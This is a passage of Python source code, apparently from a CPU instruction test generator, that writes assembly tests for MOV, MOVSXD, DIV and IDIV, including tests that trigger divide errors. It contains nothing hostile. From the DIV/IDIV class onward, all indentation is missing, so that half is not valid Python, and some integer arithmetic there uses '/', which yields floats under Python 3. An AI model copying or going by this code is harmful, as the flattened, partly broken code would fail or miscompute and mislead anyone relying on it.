                   % (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iBaseReg = iReg1, offDisp = offDisp),));
        oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iReg1],));
        return True;
    def generateMemSetupReadByScaledReg(self, oGen, cAddrBits, cbEffOp, iIndexReg, iScale, uInput, offDisp = None):
        """ Sets up memory for a memory read indirectly addressed thru a scaled register and optional displacement. """
        oGen.pushConst(uInput);
        oGen.write(' call VBINSTST_NAME(%s)\n'
                   % (oGen.needGRegMemSetup(cAddrBits, cbEffOp, offDisp = offDisp, iIndexReg = iIndexReg, iScale = iScale),));
        oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iIndexReg],));
        return True;
    def generateMemSetupReadByBaseAndScaledReg(self, oGen, cAddrBits, cbEffOp, iBaseReg, iIndexReg, iScale, uInput, offDisp):
        """ Sets up memory for a memory read indirectly addressed thru two registers with optional displacement. """
        oGen.pushConst(uInput);
        oGen.write(' call VBINSTST_NAME(%s)\n'
                   % (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iBaseReg = iBaseReg, offDisp = offDisp,
                                            iIndexReg = iIndexReg, iScale = iScale),));
        oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iIndexReg],));
        oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iBaseReg],));
        return True;
    def generateMemSetupPureRM(self, oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp = None):
        """ Sets up memory for a pure R/M addressed read, iOp2 being the R/M value. """
        oGen.pushConst(uInput);
        assert offDisp is None or iMod != 0;
        if (iOp2 != 5 and iOp2 != 13) or iMod != 0:
            oGen.write(' call VBINSTST_NAME(%s)\n'
                       % (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iOp2, offDisp),));
        else:
            oGen.write(' call VBINSTST_NAME(Common_SetupMemReadU%u)\n' % (cbEffOp*8,));
        oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
        return True;
    ## @}
    def generateOneStdTestGregGreg(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult):
        """ Generate one standard instr greg,greg test. """
        oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
        oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uInput,));
        if iOp1X != iOp2X:
            oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
        self.writeInstrGregGreg(cbEffOp, iOp1, iOp2, oGen);
        oGen.pushConst(uResult);
        oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1X, iOp2X if iOp1X != iOp2X else None),));
        _ = cbMaxOp;
        return True;
    def generateOneStdTestGregGreg8BitHighPain(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput):
        """ High 8-bit registers are a real pain! """
        assert oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) or oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2);
        # Figure out the register indexes of the max op sized regs involved.
        iOp1X = iOp1 & 3;
        iOp2X = iOp2 & 3;
        oGen.write(' ; iOp1=%u iOp1X=%u iOp2=%u iOp2X=%u\n' % (iOp1, iOp1X, iOp2, iOp2X,));
        # Calculate unshifted result.
        if iOp1X != iOp2X:
            uCur = oGen.auRegValues[iOp1X];
            if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
                uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8);
        else:
            uCur = uInput;
            if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) != oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
                if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
                    uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8);
                else:
                    uCur = rotateLeftUxx(cbMaxOp * 8, uCur, 8);
        uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen);
        # Rotate the input and/or result to match their max-op-sized registers.
        if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
            uInput = rotateLeftUxx(cbMaxOp * 8, uInput, 8);
        if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
            uResult = rotateLeftUxx(cbMaxOp * 8, uResult, 8);
        # Hand it over to an overridable worker method.
        return self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult);
    def generateOneStdTestGregMemNoSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iOp2, uInput, uResult):
        """ Generate mode 0, 1 and 2 test for the R/M=iOp2. """
        if cAddrBits == 16:
            _ = cbMaxOp;
        else:
            iMod = 0; # No disp, except for i=5.
            oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
            self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput);
            self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, None, oGen);
            oGen.pushConst(uResult);
            oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
            if iOp2 != 5 and iOp2 != 13:
                iMod = 1;
                for offDisp in oGen.getDispForMod(iMod):
                    oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
                    self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp);
                    self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen);
                    oGen.pushConst(uResult);
                    oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
                iMod = 2;
                for offDisp in oGen.getDispForMod(iMod):
                    oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
                    self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp);
                    self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen);
                    oGen.pushConst(uResult);
                    oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
        return True;
    def generateOneStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod, # pylint: disable=R0913
                                     iBaseReg, iIndexReg, iScale, uInput, uResult):
        """ Generate one SIB variations. """
        for offDisp in oGen.getDispForMod(iMod, cbEffOp):
            if ((iBaseReg == 5 or iBaseReg == 13) and iMod == 0):
                if iIndexReg == 4:
                    if cAddrBits == 64:
                        continue; # skipping.
                    oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
                    self.generateMemSetupReadByLabel(oGen, cbEffOp, uInput);
                    self.writeInstrGregSibLabel(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
                    sChecker = oGen.needGRegChecker(iOp1);
                else:
                    oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
                    self.generateMemSetupReadByScaledReg(oGen, cAddrBits, cbEffOp, iIndexReg, iScale, uInput, offDisp);
                    self.writeInstrGregSibScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
                    sChecker = oGen.needGRegChecker(iOp1, iIndexReg);
            else:
                oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
                if iIndexReg == 4:
                    self.generateMemSetupReadByReg(oGen, cAddrBits, cbEffOp, iBaseReg, uInput, offDisp);
                    self.writeInstrGregSibBase(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
                    sChecker = oGen.needGRegChecker(iOp1, iBaseReg);
                else:
                    # Avoid an odd displacement when base == index*1, the setup helper cannot split it evenly.
                    if iIndexReg == iBaseReg and iScale == 1 and offDisp is not None and (offDisp & 1):
                        if offDisp < 0: offDisp += 1;
                        else: offDisp -= 1;
                    self.generateMemSetupReadByBaseAndScaledReg(oGen, cAddrBits, cbEffOp, iBaseReg,
                                                                iIndexReg, iScale, uInput, offDisp);
                    self.writeInstrGregSibBaseAndScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
                    sChecker = oGen.needGRegChecker(iOp1, iBaseReg, iIndexReg);
            oGen.pushConst(uResult);
            oGen.write(' call VBINSTST_NAME(%s)\n' % (sChecker,));
        _ = cbMaxOp;
        return True;
    def generateStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, auInputs):
        """ Generate all SIB variations for the given iOp1 (reg) value. """
        assert cAddrBits in [32, 64];
        i = oGen.cSibBasePerRun;
        while i > 0:
            # Note! Floor division (//) so getGRegCount gets an integer with python 3 too.
            oGen.iSibBaseReg = (oGen.iSibBaseReg + 1) % oGen.oTarget.getGRegCount(cAddrBits // 8);
            if oGen.iSibBaseReg == X86_GREG_xSP: # no RSP testing atm.
                continue;
            j = oGen.getSibIndexPerRun();
            while j > 0:
                oGen.iSibIndexReg = (oGen.iSibIndexReg + 1) % oGen.oTarget.getGRegCount(cAddrBits // 8);
                if oGen.iSibIndexReg == iOp1 and oGen.iSibIndexReg != 4 and cAddrBits != cbMaxOp:
                    continue; # Don't know the high bit of the address ending up the result - skip it for now.
                for iMod in [0, 1, 2]:
                    if oGen.iSibBaseReg == iOp1 \
                      and ((oGen.iSibBaseReg != 5 and oGen.iSibBaseReg != 13) or iMod != 0) \
                      and cAddrBits != cbMaxOp:
                        continue; # Don't know the high bit of the address ending up the result - skip it for now.
                    for _ in oGen.oSibScaleRange:
                        oGen.iSibScale *= 2;
                        if oGen.iSibScale > 8:
                            oGen.iSibScale = 1;
                        for uInput in auInputs:
                            oGen.newSubTest();
                            uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[iOp1], oGen);
                            self.generateOneStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod,
                                                              oGen.iSibBaseReg, oGen.iSibIndexReg, oGen.iSibScale,
                                                              uInput, uResult);
                j -= 1;
            i -= 1;
        return True;
    def generateStandardTests(self, oGen):
        """ Generate standard tests. """
        # Parameters.
        cbDefOp = oGen.oTarget.getDefOpBytes();
        cbMaxOp = oGen.oTarget.getMaxOpBytes();
        auShortInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen);
        auLongInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen, fLong = True);
        iLongOp1 = oGen.oTarget.randGRegNoSp();
        iLongOp2 = oGen.oTarget.randGRegNoSp();
        # Register tests
        if self.fTestRegForm:
            for cbEffOp in self.acbOpVars:
                if cbEffOp > cbMaxOp:
                    continue;
                oOp2Range = range(oGen.oTarget.getGRegCount(cbEffOp));
                if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
                    oOp2Range = [iLongOp2,];
                oGen.write('; cbEffOp=%u\n' % (cbEffOp,));
                for iOp1 in range(oGen.oTarget.getGRegCount(cbEffOp)):
                    if iOp1 == X86_GREG_xSP:
                        continue; # Cannot test xSP atm.
                    for iOp2 in oOp2Range:
                        if (iOp2 >= 16 and iOp1 in range(4, 16)) \
                          or (iOp1 >= 16 and iOp2 in range(4, 16)):
                            continue; # Any REX encoding turns AH,CH,DH,BH regs into SPL,BPL,SIL,DIL.
                        if iOp2 == X86_GREG_xSP:
                            continue; # Cannot test xSP atm.
                        oGen.write('; iOp2=%u cbEffOp=%u\n' % (iOp2, cbEffOp));
                        # Use the long input list only for the randomly selected register pair.
                        for uInput in (auLongInputs if iOp1 == iLongOp1 and iOp2 == iLongOp2 else auShortInputs):
                            oGen.newSubTest();
                            if not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) and not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
                                uCur = oGen.auRegValues[iOp1 & 15] if iOp1 != iOp2 else uInput;
                                uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen);
                                self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1 & 15, iOp2, iOp2 & 15,
                                                                uInput, uResult);
                            else:
                                self.generateOneStdTestGregGreg8BitHighPain(oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput);
        # Memory test.
        if self.fTestMemForm:
            for cAddrBits in oGen.oTarget.getAddrModes():
                for cbEffOp in self.acbOpVars:
                    if cbEffOp > cbMaxOp:
                        continue;
                    for _ in oGen.getModRegRange(cbEffOp):
                        oGen.iModReg = (oGen.iModReg + 1) % oGen.oTarget.getGRegCount(cbEffOp);
                        if oGen.iModReg == X86_GREG_xSP:
                            continue; # Cannot test xSP atm.
                        if oGen.iModReg > 15:
                            continue; ## TODO AH,CH,DH,BH
                        auInputs = auLongInputs if oGen.iModReg == iLongOp1 else auShortInputs;
                        for _ in oGen.oModRmRange:
                            oGen.iModRm = (oGen.iModRm + 1) % oGen.oTarget.getGRegCount(cAddrBits * 8);
                            if oGen.iModRm != 4 or cAddrBits == 16:
                                for uInput in auInputs:
                                    oGen.newSubTest();
                                    if oGen.iModReg == oGen.iModRm and oGen.iModRm != 5 \
                                      and oGen.iModRm != 13 and cbEffOp != cbMaxOp:
                                        continue; # Don't know the high bit of the address ending up the result - skip it for now.
                                    uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[oGen.iModReg & 15], oGen);
                                    self.generateOneStdTestGregMemNoSib(oGen, cAddrBits, cbEffOp, cbMaxOp,
                                                                        oGen.iModReg, oGen.iModRm, uInput, uResult);
                            else:
                                # SIB - currently only short list of inputs or things may get seriously out of hand.
                                self.generateStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, auShortInputs);
        return True;
    def generateTest(self, oGen, sTestFnName):
        """ Emits the complete test function for this instruction. """
        oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
        self.generateStandardTests(oGen);
        oGen.write(' ret\n');
        oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
        return True;
class InstrTest_Mov_Gv_Ev(InstrTest_MemOrGreg_2_Greg):
    """
    Tests MOV Gv,Ev.
    """
    def __init__(self):
        InstrTest_MemOrGreg_2_Greg.__init__(self, 'mov Gv,Ev', self.calc_mov);
    @staticmethod
    def calc_mov(cbEffOp, uInput, uCur, oGen):
        """ Calculates the result of a mov instruction."""
        _ = oGen;
        fEffOp = (1 << (cbEffOp * 8)) - 1;
        if cbEffOp >= 4:
            # 4 and 8 byte writes replace the whole register value.
            return uInput & fEffOp;
        assert cbEffOp in (1, 2);
        # 1 and 2 byte writes keep the upper register bits from uCur.
        return (uCur & (UINT64_MAX - fEffOp)) | (uInput & fEffOp);
class InstrTest_MovSxD_Gv_Ev(InstrTest_MemOrGreg_2_Greg):
    """
    Tests MOVSXD Gv,Ev.
    """
    def __init__(self):
        InstrTest_MemOrGreg_2_Greg.__init__(self, 'movsxd Gv,Ev', self.calc_movsxd, acbOpVars = [ 8, 4, 2, ]);
        self.fTestMemForm = False; # drop this...
    def writeInstrGregGreg(self, cbEffOp, iOp1, iOp2, oGen):
        """ Writes the instruction with two general registers as operands. """
        if cbEffOp == 8:
            # Note! Floor division (//) keeps the source operand width an integer with python 3 too.
            oGen.write(' movsxd %s, %s\n'
                       % ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp // 2),));
        else:
            oGen.write(' oddmovsxd %s, %s\n'
                       % ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp),));
        return True;
    def isApplicable(self, oGen):
        """ Only applicable to 64-bit targets. """
        return oGen.oTarget.is64Bit();
    @staticmethod
    def calc_movsxd(cbEffOp, uInput, uCur, oGen):
        """
        Calculates the result of a movxsd instruction.
        Returns the result value (cbMaxOp sized).
        """
        _ = oGen;
        if cbEffOp == 8 and (uInput & RT_BIT_32(31)):
            # Sign extend the 32-bit input into the upper half.
            return (UINT32_MAX << 32) | (uInput & UINT32_MAX);
        if cbEffOp == 2:
            # 16-bit variant keeps the upper register bits.
            return (uCur & 0xffffffffffff0000) | (uInput & 0xffff);
        return uInput & UINT32_MAX;
class InstrTest_DivIDiv(InstrTestBase):
"""
Tests IDIV and DIV instructions.
"""
def __init__(self, fIsIDiv):
if not fIsIDiv:
InstrTestBase.__init__(self, 'div Gv,Ev', 'div');
else:
InstrTestBase.__init__(self, 'idiv Gv,Ev', 'idiv');
self.fIsIDiv = fIsIDiv;
def generateInputEdgeCases(self, cbEffOp, fLong, fXcpt):
""" Generate edge case inputs for cbEffOp. Returns a list of pairs, dividen + divisor. """
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
# edge tests
auRet = [];
uDivisor = 1 if fLong else 3;
uDividend = uStep * uDivisor - 1;
for i in range(5 if fLong else 3):
auRet.append([uDividend + fXcpt, uDivisor]);
if self.fIsIDiv:
auRet.append([-uDividend - fXcpt, -uDivisor]);
auRet.append([-(uDividend + uDivisor + fXcpt), uDivisor]);
auRet.append([ (uDividend + uDivisor + fXcpt), -uDivisor]);
if i <= 3 and fLong:
auRet.append([uDividend - 1 + fXcpt*3, uDivisor]);
if self.fIsIDiv:
auRet.append([-(uDividend - 1 + fXcpt*3), -uDivisor]);
uDivisor += 1;
uDividend += uStep;
uDivisor = uStep - 1;
uDividend = uStep * uDivisor - 1;
for _ in range(3 if fLong else 1):
auRet.append([uDividend + fXcpt, uDivisor]);
if self.fIsIDiv:
auRet.append([-uDividend - fXcpt, -uDivisor]);
uDivisor -= 1;
uDividend -= uStep;
if self.fIsIDiv:
uDivisor = -uStep;
for _ in range(3 if fLong else 1):
auRet.append([uDivisor * (-uStep - 1) - (not fXcpt), uDivisor]);
uDivisor += 1
uDivisor = uStep - 1;
for _ in range(3 if fLong else 1):
auRet.append([-(uDivisor * (uStep + 1) - (not fXcpt)), uDivisor]);
uDivisor -= 1
return auRet;
def generateInputsNoXcpt(self, cbEffOp, fLong = False):
""" Generate inputs for cbEffOp. Returns a list of pairs, dividen + divisor. """
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
# edge tests
auRet = self.generateInputEdgeCases(cbEffOp, fLong, False)
# random tests.
if self.fIsIDiv:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randSxx(cbEffOp * 8);
if uDivisor == 0 or uDivisor >= uStep or uDivisor < -uStep:
continue;
uDividend = randSxx(cbEffOp * 16);
uResult = uDividend / uDivisor;
if uResult >= uStep or uResult <= -uStep: # exclude difficulties
continue;
break;
auRet.append([uDividend, uDivisor]);
else:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randUxx(cbEffOp * 8);
if uDivisor == 0 or uDivisor >= uStep:
continue;
uDividend = randUxx(cbEffOp * 16);
uResult = uDividend / uDivisor;
if uResult >= uStep:
continue;
break;
auRet.append([uDividend, uDivisor]);
return auRet;
def generateOneStdTestGreg(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV rDX:rAX,<GREG>' test. """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fEffOp = ((1 << (cbEffOp *8) ) - 1);
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
fTopOp = fMaxOp - fEffOp;
fFullOp1 = ((1 << (cbEffOp*16)) - 1);
uAX = iDividend & fFullOp1; # full with unsigned
uDX = uAX >> (cbEffOp*8);
uAX &= fEffOp;
uOp2Val = iDivisor & fEffOp;
iQuotient = iDividend / iDivisor;
iReminder = iDividend % iDivisor;
if iReminder != 0 and iQuotient < 0: # python has different rounding rules for negative division.
iQuotient += 1;
iReminder -= iDivisor;
uAXResult = iQuotient & fEffOp;
uDXResult = iReminder & fEffOp;
if cbEffOp < cbMaxOp:
uAX |= randUxx(cbMaxOp * 8) & fTopOp;
uDX |= randUxx(cbMaxOp * 8) & fTopOp;
uOp2Val |= randUxx(cbMaxOp * 8) & fTopOp;
if cbEffOp < 4:
uAXResult |= uAX & fTopOp;
uDXResult |= uDX & fTopOp;
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
' ; iQuotient=%#x (%d) iReminder=%#x (%d)\n'
% ( iDividend & fFullOp1, iDividend, iDivisor & fEffOp, iDivisor,
iQuotient & fEffOp, iQuotient, iReminder & fEffOp, iReminder, ));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX], uDX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
oGen.pushConst(uDXResult);
oGen.pushConst(uAXResult);
oGen.write(' %-4s %s\n' % (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, X86_GREG_xDX, iOp2),));
return True;
def generateOneStdTestGreg8Bit(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV AX,<GREG>' test (8-bit). """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
iOp2X = (iOp2 & 3) if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2) else iOp2;
assert iOp2X != X86_GREG_xAX;
uAX = iDividend & UINT16_MAX; # full with unsigned
uOp2Val = iDivisor & UINT8_MAX;
iQuotient = iDividend / iDivisor;
iReminder = iDividend % iDivisor;
if iReminder != 0 and iQuotient < 0: # python has different rounding rules for negative division.
iQuotient += 1;
iReminder -= iDivisor;
uAXResult = (iQuotient & UINT8_MAX) | ((iReminder & UINT8_MAX) << 8);
uAX |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT16_MAX);
uAXResult |= uAX & (fMaxOp - UINT16_MAX);
uOp2Val |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT8_MAX);
if iOp2X != iOp2:
uOp2Val = rotateLeftUxx(cbMaxOp * 8, uOp2Val, 8);
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
' ; iQuotient=%#x (%d) iReminder=%#x (%d)\n'
% ( iDividend & UINT16_MAX, iDividend, iDivisor & UINT8_MAX, iDivisor,
iQuotient & UINT8_MAX, iQuotient, iReminder & UINT8_MAX, iReminder, ));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
oGen.pushConst(uAXResult);
oGen.write(' %-4s %s\n' % (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, iOp2X),));
return;
def generateStandardTests(self, oGen):
""" Generates test that causes no exceptions. """
# Parameters.
iLongOp2 = oGen.oTarget.randGRegNoSp();
# Register tests
if True:
for cbEffOp in ( 8, 4, 2, 1 ):
if cbEffOp > oGen.oTarget.getMaxOpBytes():
continue;
oGen.write('; cbEffOp=%u\n' % (cbEffOp,));
oOp2Range = range(oGen.oTarget.getGRegCount(cbEffOp));
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
oOp2Range = [iLongOp2,];
for iOp2 in oOp2Range:
if iOp2 == X86_GREG_xSP:
continue; # Cannot test xSP atm.
if iOp2 == X86_GREG_xAX or (cbEffOp > 1 and iOp2 == X86_GREG_xDX):
continue; # Will overflow or be too complicated to get right.
if cbEffOp == 1 and iOp2 == (16 if oGen.oTarget.is64Bit() else 4):
continue; # Avoid dividing by AH, same reasons as above.
for iDividend, iDivisor in self.generateInputsNoXcpt(cbEffOp, iOp2 == iLongOp2):
oGen.newSubTest();
if cbEffOp > 1:
self.generateOneStdTestGreg(oGen, cbEffOp, iOp2, iDividend, iDivisor);
else:
self.generateOneStdTestGreg8Bit(oGen, cbEffOp, iOp2, iDividend, iDivisor);
## Memory test.
#if False:
# for cAddrBits in oGen.oTarget.getAddrModes():
# for cbEffOp in self.acbOpVars:
# if cbEffOp > cbMaxOp:
# continue;
#
# auInputs = auLongInputs if oGen.iModReg == iLongOp1 else auShortInputs;
# for _ in oGen.oModRmRange:
# oGen.iModRm = (oGen.iModRm + 1) % oGen.oTarget.getGRegCount(cAddrBits * 8);
# if oGen.iModRm != 4 or cAddrBits == 16:
# for uInput in auInputs:
# oGen.newSubTest();
# if oGen.iModReg == oGen.iModRm and oGen.iModRm != 5 and oGen.iModRm != 13 and cbEffOp != cbMaxOp:
# continue; # Don't know the high bit of the address ending up the result - skip it for now.
# uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[oGen.iModReg & 15], oGen);
# self.generateOneStdTestGregMemNoSib(oGen, cAddrBits, cbEffOp, cbMaxOp,
# oGen.iModReg, oGen.iModRm, uInput, uResult);
# else:
# # SIB - currently only short list of inputs or things may get seriously out of hand.
# self.generateStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, auShortInputs);
#
return True;
def generateInputsXcpt(self, cbEffOp, fLong = False):
"""
Generate inputs for cbEffOp that will overflow or underflow.
Returns a list of pairs, dividen + divisor.
"""
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
# edge tests
auRet = self.generateInputEdgeCases(cbEffOp, fLong, True);
auRet.extend([[0, 0], [1, 0], [ uStep * uStep / 2 - 1, 0]]);
# random tests.
if self.fIsIDiv:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randSxx(cbEffOp * 8);
uDividend = randSxx(cbEffOp * 16);
if uDivisor >= uStep or uDivisor < -uStep:
continue;
if uDivisor != 0:
uResult = uDividend / uDivisor;
if (uResult <= uStep and uResult >= 0) or (uResult >= -uStep and uResult < 0):
continue; # exclude difficulties
break;
auRet.append([uDividend, uDivisor]);
else:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randUxx(cbEffOp * 8);
uDividend = randUxx(cbEffOp * 16);
if uDivisor >= uStep:
continue;
if uDivisor != 0:
uResult = uDividend / uDivisor;
if uResult < uStep:
continue;
break;
auRet.append([uDividend, uDivisor]);
return auRet;
def generateOneDivideErrorTestGreg(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV rDX:rAX,<GREG>' test that causes #DE. """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fEffOp = ((1 << (cbEffOp *8) ) - 1);
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
fTopOp = fMaxOp - fEffOp;
fFullOp1 = ((1 << (cbEffOp*16)) - 1);
uAX = iDividend & fFullOp1; # full with unsigned
uDX = uAX >> (cbEffOp*8);
uAX &= fEffOp;
uOp2Val = iDivisor & fEffOp;
if cbEffOp < cbMaxOp:
uAX |= randUxx(cbMaxOp * 8) & fTopOp;
uDX |= randUxx(cbMaxOp * 8) & fTopOp;
uOp2Val |= randUxx(cbMaxOp * 8) & fTopOp;
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
% ( iDividend & fFullOp1, iDividend, iDivisor & fEffOp, iDivisor,));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX], uDX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX],));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX],));
oGen.write(' VBINSTST_TRAP_INSTR X86_XCPT_DE, 0, %-4s %s\n'
% (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, X86_GREG_xDX, iOp2),));
return True;
def generateOneDivideErrorTestGreg8Bit(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV AX,<GREG>' test that causes #DE (8-bit). """
if not oGen.oTarget.is64Bit() and iOp2 == 4: # Avoid AH.
iOp2 = 5;
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
iOp2X = (iOp2 & 3) if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2) else iOp2;
assert iOp2X != X86_GREG_xAX;
uAX = iDividend & UINT16_MAX; # full with unsigned
uOp2Val = iDivisor & UINT8_MAX;
uAX |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT16_MAX);
uOp2Val |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT8_MAX);
if iOp2X != iOp2:
uOp2Val = rotateLeftUxx(cbMaxOp * 8, uOp2Val, 8);
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
% ( iDividend & UINT16_MAX, iDividend, iDivisor & UINT8_MAX, iDivisor,));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
